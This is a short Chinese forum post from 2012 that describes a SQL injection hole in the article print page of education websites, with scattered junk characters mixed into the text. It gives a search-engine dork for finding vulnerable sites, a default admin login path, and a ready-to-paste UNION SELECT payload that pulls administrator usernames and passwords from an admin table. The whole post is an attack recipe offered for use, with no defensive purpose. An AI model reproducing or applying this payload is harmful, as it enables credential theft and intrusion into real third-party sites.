教育站打印页面漏洞' M. h4 @1 c4 y, ~1 l* Y: {
百度或google搜索 inurl:info_Print.asp?ArticleID=
. \2 h1 ?. U+ z: ]- x默认后台:/ad_login.asp+ b/ s5 [( h/ h' }+ r0 C
爆管理员密码:
# a& B7 W) o/ J+ O( k3 v在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可" I* B% g( A) y. F
7 k) g' k8 X8 n- e6 Q
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin2 Y7 s; J' A: u* k- L' Y
. {; j7 U7 s% [ t2 r- {- U! G
作者:佚名 % [1 A" J/ O, ~3 S" c
$ Z: F7 y" a' A' e
. H: k+ \ Q2 O- k( ~! W: e* N" M
|
发表于 2012-10-31 08:37:31
收藏
支持
反对